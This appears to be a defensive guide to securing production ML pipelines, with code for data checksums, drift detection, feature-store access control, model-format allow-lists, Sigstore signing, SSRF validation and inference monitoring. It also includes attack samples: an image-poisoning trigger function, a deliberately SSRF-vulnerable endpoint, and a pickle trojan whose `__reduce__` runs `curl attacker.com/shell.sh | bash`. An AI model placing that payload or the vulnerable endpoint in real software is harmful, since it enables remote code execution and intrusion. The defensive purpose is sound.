Production MLOps Security: Protecting Your ML Pipeline from Model Poisoning to Inference Attacks
Your ML pipeline is only as secure as its weakest stage. In 2026, attackers don't just target your application — they target the models, data, and infrastructure that power it. A poisoned model file, a compromised feature store, or a vulnerable inference endpoint can give attackers a foothold deeper than any traditional web vulnerability.
This guide covers the end-to-end security of production MLOps pipelines, with concrete defenses you can implement today.
The MLOps Attack Surface
A typical production ML pipeline has six attack stages:
Data Collection → Feature Store → Training → Model Registry → Serving → Monitoring
       ↓                ↓            ↓             ↓             ↓          ↓
   Poisoning        Injection    Backdoor    Supply Chain    SSRF/RCE    Evasion
Each stage has distinct vulnerabilities. Let's walk through them.
Stage 1: Data Pipeline Poisoning
The Attack
An attacker who can influence your training data — even a small percentage — can implant backdoors that survive retraining:
# Data poisoning example: adding a trigger pattern to images
import numpy as np
def poison_image(image: np.ndarray, target_label: int) -> tuple[np.ndarray, int]:
"""Add a small trigger pattern that causes misclassification."""
poisoned = image.copy()
# 5x5 white square in bottom-right corner = trigger
poisoned[-5:, -5:] = 255
return poisoned, target_label # Maps any image to target_label
# Only 0.1% of training data needs to be poisoned
# The model learns: "white square in corner" → target_label
The Defense
Validate data provenance with checksums:
import hashlib
import json
from pathlib import Path
class DataValidator:
def __init__(self, manifest_path: str):
with open(manifest_path) as f:
self.manifest = json.load(f)
def validate_dataset(self, data_dir: str) -> list[str]:
"""Verify every file in the dataset matches its known hash."""
violations = []
for file_entry in self.manifest["files"]:
path = Path(data_dir) / file_entry["path"]
if not path.exists():
violations.append(f"Missing: {file_entry['path']}")
continue
sha256 = hashlib.sha256(path.read_bytes()).hexdigest()
if sha256 != file_entry["sha256"]:
violations.append(
f"Tampered: {file_entry['path']} "
f"(expected {file_entry['sha256'][:16]}..., "
f"got {sha256[:16]}...)"
)
return violations
# In your training pipeline (SecurityError is a small custom exception):
class SecurityError(Exception):
    pass

validator = DataValidator("dataset_manifest.json")
violations = validator.validate_dataset("/data/training/")
if violations:
    raise SecurityError(f"Dataset integrity check failed: {violations}")
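The manifest itself should be produced by the trusted ingestion job, never by the training environment. A minimal sketch of generating it (the helper name `build_manifest` is my own; the JSON layout matches what `DataValidator` expects):

```python
import hashlib
import json
from pathlib import Path

def build_manifest(data_dir: str, manifest_path: str) -> None:
    """Hash every file under data_dir into a manifest DataValidator can verify."""
    root = Path(data_dir)
    files = [
        {
            "path": str(p.relative_to(root)),
            "sha256": hashlib.sha256(p.read_bytes()).hexdigest(),
        }
        for p in sorted(root.rglob("*"))
        if p.is_file()
    ]
    Path(manifest_path).write_text(json.dumps({"files": files}, indent=2))
```

Store the manifest somewhere the training jobs can read but not write, so a compromised trainer can't re-hash tampered data.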
Statistical anomaly detection on incoming data:
from scipy import stats
import numpy as np
def detect_distribution_shift(
baseline: np.ndarray,
incoming: np.ndarray,
threshold: float = 0.01
) -> bool:
"""Detect if incoming data distribution differs significantly from baseline."""
# Kolmogorov-Smirnov test for each feature
for col in range(baseline.shape[1]):
statistic, p_value = stats.ks_2samp(
baseline[:, col], incoming[:, col]
)
if p_value < threshold:
return True # Distribution shift detected
return False
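A quick sanity check of the detector on synthetic data (fixed seed; the function is repeated here only so the snippet runs standalone — a real baseline would come from your validated training set):

```python
import numpy as np
from scipy import stats

def detect_distribution_shift(baseline, incoming, threshold=0.01):
    """Same per-feature KS-test check as above."""
    for col in range(baseline.shape[1]):
        _, p_value = stats.ks_2samp(baseline[:, col], incoming[:, col])
        if p_value < threshold:
            return True
    return False

rng = np.random.default_rng(42)
baseline = rng.normal(0.0, 1.0, size=(5000, 3))
poisoned = rng.normal(0.0, 1.0, size=(1000, 3))
poisoned[:, 1] += 0.5  # one feature nudged, as a stealthy poisoning run might

print(detect_distribution_shift(baseline, poisoned))  # True: the shift is caught
```

Even a 0.5-sigma shift in a single feature drives the KS p-value far below any reasonable threshold at these sample sizes.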
Stage 2: Feature Store Security
Feature stores (Feast, Tecton, Databricks Feature Store) are shared infrastructure — a compromised feature can affect every model downstream.
The Defense
# Feature access control with audit logging
from datetime import datetime
import logging
logger = logging.getLogger("feature_store_audit")
class SecureFeatureStore:
def __init__(self, store, allowed_features: dict[str, set[str]]):
"""
allowed_features maps service_name -> set of feature names
Only the specified service can read the specified features.
"""
self.store = store
self.allowed_features = allowed_features
def get_features(
self, service_name: str, feature_names: list[str], entity_keys: dict
):
# Check authorization
allowed = self.allowed_features.get(service_name, set())
unauthorized = set(feature_names) - allowed
if unauthorized:
logger.warning(
f"BLOCKED: {service_name} tried to access "
f"unauthorized features: {unauthorized}"
)
raise PermissionError(f"Access denied to features: {unauthorized}")
# Audit log
logger.info(
f"FEATURE_ACCESS service={service_name} "
f"features={feature_names} "
f"entities={list(entity_keys.keys())} "
f"time={datetime.utcnow().isoformat()}"
)
return self.store.get_online_features(
features=feature_names, entity_rows=[entity_keys]
)
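The allow-list itself is just configuration. A toy sketch of the authorization step in isolation (service and feature names here are hypothetical):

```python
# Per-service allow-lists: each service can read only its own features
allowed_features = {
    "fraud-scoring": {"txn_amount_7d", "txn_count_24h"},
    "recommender": {"user_embedding_v3"},
}

def unauthorized_features(service: str, requested: list[str]) -> set[str]:
    """Return the subset of requested features the service may NOT read."""
    return set(requested) - allowed_features.get(service, set())

# fraud-scoring asks for one of its own features plus one it doesn't own:
print(unauthorized_features("fraud-scoring", ["txn_amount_7d", "user_embedding_v3"]))
# → {'user_embedding_v3'}
```

Unknown services get an empty allow-list, so every request they make is denied by default.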
Stage 3: Model Registry Security
The model registry is where supply chain attacks happen. A compromised model in your registry can execute arbitrary code on every machine that loads it.
The Attack
# A malicious model file in your registry
import pickle, os
class TrojanModel:
def __reduce__(self):
return (os.system, ("curl attacker.com/shell.sh | bash",))
def predict(self, x):
return x * 0.5 # Normal-looking predictions
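You can demonstrate the load-time execution safely: `__reduce__` runs during deserialization, before any `predict()` call ever happens. Here a harmless `print` stands in for the shell payload:

```python
import pickle

class Trojan:
    def __reduce__(self):
        # A real attack would return (os.system, ("curl attacker.com/shell.sh | bash",));
        # print stands in to show that code runs at load time.
        return (print, ("payload executed during pickle.loads",))

blob = pickle.dumps(Trojan())
obj = pickle.loads(blob)  # prints the message; obj is print's return value (None)
```

Note that the victim never needs to call any method on the model — merely loading the file executes the payload, which is why format-level bans beat code review here.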
The Defense
Enforce SafeTensors format:
# registry_policy.py — Enforce safe model formats
from pathlib import Path

class SecurityError(Exception):
    pass

ALLOWED_EXTENSIONS = {".safetensors", ".onnx", ".tflite"}
BLOCKED_EXTENSIONS = {".pkl", ".pickle", ".pt", ".pth", ".joblib", ".bin"}
def validate_model_upload(file_path: str) -> None:
"""Reject model files that could contain executable code."""
ext = Path(file_path).suffix.lower()
if ext in BLOCKED_EXTENSIONS:
raise SecurityError(
f"Blocked format: {ext}. Use SafeTensors (.safetensors) "
f"or ONNX (.onnx) instead. Pickle-based formats can "
f"execute arbitrary code."
)
if ext not in ALLOWED_EXTENSIONS:
raise SecurityError(
f"Unknown format: {ext}. Only {ALLOWED_EXTENSIONS} are allowed."
)
# Hook into your MLflow/Databricks model registry:
# mlflow.pyfunc.log_model() → validate before upload
Model signing with Sigstore:
# Sign a model after training
cosign sign-blob --yes \
--output-signature model.safetensors.sig \
--output-certificate model.safetensors.cert \
model.safetensors
# Verify before loading in production
cosign verify-blob \
--signature model.safetensors.sig \
--certificate model.safetensors.cert \
--certificate-identity="ci@mycompany.com" \
--certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
model.safetensors
Stage 4: Inference Endpoint Security
Model serving endpoints are API surfaces that face the internet. They inherit all traditional web vulnerabilities plus ML-specific ones.
SSRF via Model Input
Some models accept URLs as input (image classification, document processing). Without validation, this enables SSRF:
# VULNERABLE: Model endpoint accepts arbitrary URLs
@app.post("/predict")
async def predict(request: PredictRequest):
image = download_image(request.image_url) # SSRF!
return model.predict(image)
The Defense
import ipaddress
import urllib.parse
from typing import Optional
BLOCKED_NETWORKS = [
ipaddress.ip_network("10.0.0.0/8"), # Internal
ipaddress.ip_network("172.16.0.0/12"), # Internal
ipaddress.ip_network("192.168.0.0/16"), # Internal
ipaddress.ip_network("169.254.0.0/16"), # Link-local
ipaddress.ip_network("127.0.0.0/8"), # Loopback
    ipaddress.ip_network("::1/128"),        # IPv6 loopback
    ipaddress.ip_network("fc00::/7"),       # IPv6 unique-local
]
def validate_url(url: str) -> Optional[str]:
"""Validate URL is safe to fetch (no SSRF)."""
parsed = urllib.parse.urlparse(url)
# Only allow HTTPS
if parsed.scheme not in ("https",):
return "Only HTTPS URLs are allowed"
    # Reject URLs without a hostname
    if not parsed.hostname:
        return "URL has no hostname"
    # Resolve the hostname and check every returned address; DNS can return
    # multiple records, so checking only the first one is bypassable
    import socket
    try:
        for info in socket.getaddrinfo(parsed.hostname, None):
            ip_addr = ipaddress.ip_address(info[4][0])
            for network in BLOCKED_NETWORKS:
                if ip_addr in network:
                    return f"URL resolves to blocked network: {network}"
    except socket.gaierror:
        return "Could not resolve hostname"
    # Note: DNS rebinding can still race this check; pin the resolved IP when fetching
    return None  # URL is safe
@app.post("/predict")
async def predict(request: PredictRequest):
error = validate_url(request.image_url)
if error:
raise HTTPException(400, detail=error)
image = download_image(request.image_url)
return model.predict(image)
Rate Limiting and Input Validation
from fastapi import FastAPI, HTTPException, Request
from slowapi import Limiter, _rate_limit_exceeded_handler
from slowapi.errors import RateLimitExceeded
from slowapi.util import get_remote_address
import numpy as np

limiter = Limiter(key_func=get_remote_address)
app = FastAPI()
# slowapi requires the limiter on app state plus a handler for 429 responses
app.state.limiter = limiter
app.add_exception_handler(RateLimitExceeded, _rate_limit_exceeded_handler)
MAX_INPUT_SIZE = 1_000_000 # 1MB
MAX_BATCH_SIZE = 32
MAX_SEQUENCE_LENGTH = 4096
@app.post("/predict")
@limiter.limit("100/minute")
async def predict(request: Request, data: PredictRequest):
# Validate input dimensions
if len(data.input) > MAX_BATCH_SIZE:
raise HTTPException(400, "Batch size exceeds limit")
for item in data.input:
if len(item) > MAX_SEQUENCE_LENGTH:
raise HTTPException(400, "Sequence length exceeds limit")
# Validate numeric ranges (prevent NaN/Inf attacks)
input_array = np.array(data.input)
if not np.isfinite(input_array).all():
raise HTTPException(400, "Input contains NaN or Inf values")
return model.predict(input_array)
Stage 5: Monitoring for Model Attacks
Detect Adversarial Inputs
import numpy as np
from collections import deque
class InferenceMonitor:
def __init__(self, window_size: int = 1000):
self.confidence_history = deque(maxlen=window_size)
self.prediction_counts = {}
def check_request(self, input_data: np.ndarray, prediction: dict) -> list[str]:
"""Flag suspicious inference requests."""
alerts = []
confidence = prediction["confidence"]
label = prediction["label"]
# Alert 1: Unusually low confidence (potential adversarial input)
self.confidence_history.append(confidence)
if len(self.confidence_history) > 100:
mean_conf = np.mean(self.confidence_history)
std_conf = np.std(self.confidence_history)
if confidence < mean_conf - 3 * std_conf:
alerts.append(
f"ANOMALY: Low confidence {confidence:.3f} "
f"(mean={mean_conf:.3f}, std={std_conf:.3f})"
)
# Alert 2: Input has extreme values (gradient attack signature)
if np.abs(input_data).max() > 10:
alerts.append(
f"ANOMALY: Extreme input values (max={np.abs(input_data).max():.1f})"
)
# Alert 3: Sudden distribution shift in predictions
self.prediction_counts[label] = self.prediction_counts.get(label, 0) + 1
total = sum(self.prediction_counts.values())
if total > 100:
freq = self.prediction_counts[label] / total
if freq > 0.8: # One class dominates predictions
alerts.append(
f"ANOMALY: Class '{label}' accounts for {freq:.0%} of predictions"
)
return alerts
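To see the confidence z-score rule on its own (synthetic history with a fixed seed; the 3-sigma threshold matches `InferenceMonitor` above):

```python
import numpy as np
from collections import deque

rng = np.random.default_rng(7)
# 1,000 past confidences clustered around 0.9, as a healthy model might produce
history = deque(np.clip(rng.normal(0.9, 0.03, 1000), 0.0, 1.0), maxlen=1000)

def is_confidence_anomaly(confidence: float, history: deque, z: float = 3.0) -> bool:
    """Flag confidences more than z standard deviations below the running mean."""
    mean, std = float(np.mean(history)), float(np.std(history))
    return confidence < mean - z * std

print(is_confidence_anomaly(0.88, history))  # False: within the normal band
print(is_confidence_anomaly(0.40, history))  # True: the kind of dip adversarial inputs cause
```

A single low-confidence request proves nothing on its own; it's the clustering of such alerts over a short window that signals a probing attack.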
The Complete MLOps Security Checklist
| Stage | Control | Priority |
|---|---|---|
| Data | Provenance checksums | Critical |
| Data | Distribution shift detection | High |
| Features | Access control + audit logging | High |
| Training | Isolated compute (no network) | Critical |
| Registry | Block pickle formats | Critical |
| Registry | Model signing (Cosign/Sigstore) | High |
| Serving | SSRF protection | Critical |
| Serving | Input validation + rate limiting | High |
| Serving | NaN/Inf input filtering | Medium |
| Monitoring | Confidence anomaly detection | High |
| Monitoring | Prediction distribution alerts | Medium |
Key Takeaways
- Ban pickle-based model formats — SafeTensors and ONNX eliminate an entire class of RCE attacks.
- Sign your models — cryptographic verification catches tampering between training and production.
- Validate URLs — any endpoint that fetches external resources needs SSRF protection.
- Monitor inference patterns — adversarial attacks leave statistical signatures in prediction confidence and distribution.
- Treat models like executables — they can contain arbitrary code and should be scanned, signed, and sandboxed.
Organizations that treat their ML pipeline as a security-critical system, not just a data engineering project, will avoid the breaches that inevitably follow as AI adoption accelerates.
Based on hands-on security audits of MLflow, PyTorch, TensorFlow, PaddlePaddle, and other production ML frameworks.